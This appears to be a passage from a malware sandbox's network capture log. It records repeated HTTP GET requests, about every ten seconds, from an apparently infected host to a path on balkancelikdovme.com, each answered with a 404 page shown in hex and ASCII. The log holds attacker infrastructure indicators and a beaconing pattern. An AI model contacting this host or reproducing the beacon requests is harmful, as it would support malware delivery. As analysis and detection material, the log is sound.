Aug 23, 2023 20:15:48.475735903 CEST	44	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:15:48 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:15:48.715687037 CEST	45	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:15:48 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:15:58.453622103 CEST	1875	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:15:58.486627102 CEST	1876	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:15:58 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:08.409265995 CEST	1876	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:08.442828894 CEST	1877	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:18.423207998 CEST	1896	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:18.456218004 CEST	1897	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:18 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:28.441639900 CEST	2247	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:28.474505901 CEST	2249	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:28 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:38.397792101 CEST	2265	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:38.430927038 CEST	2266	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:38 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 